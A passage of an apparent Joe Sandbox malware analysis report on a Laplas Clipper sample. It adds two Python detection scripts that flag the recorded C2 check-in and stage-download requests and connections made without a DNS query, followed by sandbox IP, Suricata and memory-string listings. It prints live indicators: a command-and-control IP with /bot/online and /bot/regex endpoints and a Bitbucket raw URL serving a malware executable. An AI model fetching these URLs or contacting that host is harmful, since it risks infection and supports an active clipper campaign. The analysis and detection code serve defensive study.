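The requests recorded above are the observable a proxy or sensor check would key on: three .exe stages pulled through Bitbucket's raw-file endpoint, then GET /bot/regex and GET /bot/online?guid=...&key=... sent straight to a bare IP address with Cache-Control: no-cache and no User-Agent header. The following is an added example, not code from the report, from Joe Sandbox or from the analysed sample: a Python checker that parses raw HTTP request records and flags that pattern. The three malicious sample requests are the ones recorded in the report; the fourth is a constructed benign request. The "clipper_*" labels follow the report's Laplas Clipper verdict and the endpoint names are taken from the recorded traffic, not from any protocol documentation.

```python
"""Added example: flag the HTTP request pattern recorded in the sandbox report.
Not code from the report, Joe Sandbox or the analysed sample."""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Bare IPv4 (optionally with a port) in the Host header: no hostname was resolved.
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# The key= value in the recorded check-in is 64 lowercase hex characters.
HEX64 = re.compile(r"^[0-9a-f]{64}$")


@dataclass
class Finding:
    kind: str
    host: str
    path: str
    detail: dict = field(default_factory=dict)


def parse_request(raw: str):
    """Split a raw HTTP/1.x request (request line plus headers) into
    (method, target, headers); header names are lower-cased."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect(raw: str) -> list:
    """Return the findings for one request (empty list when nothing matches)."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    parts = urlsplit(target)
    path, query = parts.path, parse_qs(parts.query)
    findings = []

    # Check-in pattern from the report: GET /bot/... straight to an IP address.
    if method == "GET" and IPV4_HOST.match(host) and path.startswith("/bot/"):
        if path == "/bot/online" and "guid" in query and "key" in query:
            key = query["key"][0]
            findings.append(Finding("clipper_checkin", host, path, {
                "guid": query["guid"][0],                 # host\user style identifier
                "key": key,
                "key_is_64hex": bool(HEX64.match(key)),
                "user_agent": headers.get("user-agent"),  # None in the recorded traffic
            }))
        elif path == "/bot/regex":
            findings.append(Finding("clipper_regex_fetch", host, path,
                                    {"user_agent": headers.get("user-agent")}))

    # Stage download: an .exe fetched through Bitbucket's raw-file endpoint.
    if host.endswith("bitbucket.org") and "/raw/" in path and path.lower().endswith(".exe"):
        findings.append(Finding("raw_exe_download", host, path,
                                {"file": path.rsplit("/", 1)[-1]}))
    return findings


# Three requests as recorded in the report plus one constructed benign request.
SAMPLE_REQUESTS = [
    "GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1\r\n"
    "Host: bitbucket.org\r\nConnection: Keep-Alive\r\n",
    "GET /bot/regex HTTP/1.1\r\nHost: 45.159.189.105\r\nCache-Control: no-cache\r\n",
    "GET /bot/online?guid=724471\\user&key="
    "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1\r\n"
    "Host: 45.159.189.105\r\nCache-Control: no-cache\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n",
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Run inspect() over a batch of raw requests and collect all findings."""
    findings = []
    for raw in requests:
        findings.extend(inspect(raw))
    return findings


if __name__ == "__main__":
    for f in scan():
        print(f.kind, f.host, f.path, f.detail)
```

The bare-IP Host check is what separates this from ordinary API traffic; the guid and key are carried out as detail so they can be used as per-victim identifiers when pivoting across hosts.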
                        Source: Joe Sandbox View. IP Address: 45.159.189.105
                        Source: Joe Sandbox View. IP Address: 185.166.143.49
                        Source: Joe Sandbox View. ASN Name: HOSTING-SOLUTIONSUS
                        Source: Joe Sandbox View. ASN Name: AMAZON-02US
                        Source: Joe Sandbox View. JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network traffic. Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49739 -> 45.159.189.105:80
                        Source: Network traffic. Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 45.159.189.105:80
                        Source: Network traffic. Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50007 -> 45.159.189.105:80
                        Source: Network traffic. Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50008 -> 45.159.189.105:80
                        Source: Network traffic. Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 185.166.143.49:443
                        Source: Network traffic. Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 185.166.143.49:443
                        Source: unknown. TCP traffic detected without corresponding DNS query: 45.159.189.105 (reported 20 times)
                        Source: unknown. UDP traffic detected without corresponding DNS query: 1.1.1.1
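The "traffic detected without corresponding DNS query" entries are a correlation between the DNS log and the connection log: a destination address that no earlier DNS answer returned. What follows is an added example, not part of the report and not Joe Sandbox's code: a Python version of that correlation over constructed logs. The addresses are the ones the report lists; the bitbucket.org answer, the timestamps and the 10-minute freshness window are assumed for the example. An answer older than the window counts as stale, and traffic to a known resolver on port 53 is exempt unless the exemption is switched off, which is the only case in which the sandbox's own 1.1.1.1 entry is reproduced.

```python
"""Added example: connections whose destination IP was never returned by a
preceding (and still fresh) DNS answer. Not code from the report or Joe Sandbox."""
from bisect import bisect_right
from collections import Counter
from datetime import datetime, timedelta

# Constructed logs. Addresses are the ones the report lists; the bitbucket.org
# answer and all timestamps are assumed for the example.
DNS_LOG = [
    # (timestamp, query name, answer addresses)
    ("2024-10-04T12:00:01", "bitbucket.org", ["185.166.143.49"]),
]
CONN_LOG = [
    # (timestamp, protocol, destination ip, destination port)
    ("2024-10-04T12:00:00", "udp", "1.1.1.1", 53),          # the resolver itself
    ("2024-10-04T12:00:02", "tcp", "185.166.143.49", 443),  # resolved 1 s earlier
    ("2024-10-04T12:00:05", "tcp", "45.159.189.105", 80),   # never resolved
    ("2024-10-04T12:00:06", "tcp", "45.159.189.105", 80),
    ("2024-10-04T12:20:00", "tcp", "185.166.143.49", 443),  # answer is 20 min old
]

DEFAULT_RESOLVERS = frozenset({"1.1.1.1", "8.8.8.8"})


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def index_dns_answers(dns_log):
    """Map each answered address to the sorted list of times it was returned."""
    seen = {}
    for ts, _qname, answers in dns_log:
        for ip in answers:
            seen.setdefault(ip, []).append(_ts(ts))
    for times in seen.values():
        times.sort()
    return seen


def was_resolved(ip, at, seen, ttl):
    """True if 'ip' appeared in a DNS answer at or before 'at' and within 'ttl'."""
    times = seen.get(ip)
    if not times:
        return False
    i = bisect_right(times, at) - 1      # latest answer at or before 'at'
    return i >= 0 and at - times[i] <= ttl


def find_unresolved_connections(conn_log, dns_log, ttl=timedelta(minutes=10),
                                resolvers=DEFAULT_RESOLVERS):
    """Return connections (ts, proto, ip, port) with no fresh DNS answer for 'ip'.
    Port-53 traffic to an address in 'resolvers' is exempt."""
    seen = index_dns_answers(dns_log)
    flagged = []
    for ts, proto, ip, port in conn_log:
        if port == 53 and ip in resolvers:
            continue
        if not was_resolved(ip, _ts(ts), seen, ttl):
            flagged.append((ts, proto, ip, port))
    return flagged


def summarize(flagged) -> Counter:
    """Count flagged connections per (protocol, destination), as the report does."""
    return Counter((proto, ip) for _ts, proto, ip, _port in flagged)


if __name__ == "__main__":
    hits = find_unresolved_connections(CONN_LOG, DNS_LOG)
    for (proto, ip), n in summarize(hits).items():
        print(f"{proto.upper()} traffic without corresponding DNS query: {ip} ({n}x)")
```

The freshness window is the design choice worth tuning: too short and every long-lived keep-alive session to a legitimately resolved host is flagged, too long and a stale cached answer hides a direct-IP beacon that happens to reuse an address.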
                        Source: global traffic. DNS traffic detected: DNS query: bitbucket.org
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://45.159.189.105/
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://45.159.189.105/bot/online?guid=724471
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001165000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000110D000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://45.159.189.105/bot/regex
                        Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://45.159.189.105/bot/regexystem32
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://bitbucket.org
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                        Source: powershell.exe, 00000028.00000002.2588137251.000001C536E3E000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://crl.microsoft
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                        Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                        Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: lsass.exe, 0000002C.00000002.2966233534.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C0200000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                        Source: lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://nuget.org/NuGet.exe
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ocsp.digicert.com0
                        Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ocsp.digicert.com0:
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ocsp.digicert.com0H
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ocsp.digicert.com0I
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://ocsp.msocsp.com0
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: svchost.exe, 00000036.00000000.2312885575.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp. String found in binary or memory: http://schemas.micro
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                        Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                        Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://www.digicert.com/CPS0
                        Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp. String found in binary or memory: http://www.digicert.com/CPS0~
                        Source: powershell.exe, 00000001.00000002.1960407447.000001EC48E3D000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://www.t.com/pkiops/cersoft%20Time-Stam202010(1).crt0
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B9567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B9541000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://aui-cdn.atlassian.com/
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B42000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC319F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31666000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfa
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC314B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp. String found in binary or memory: https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe
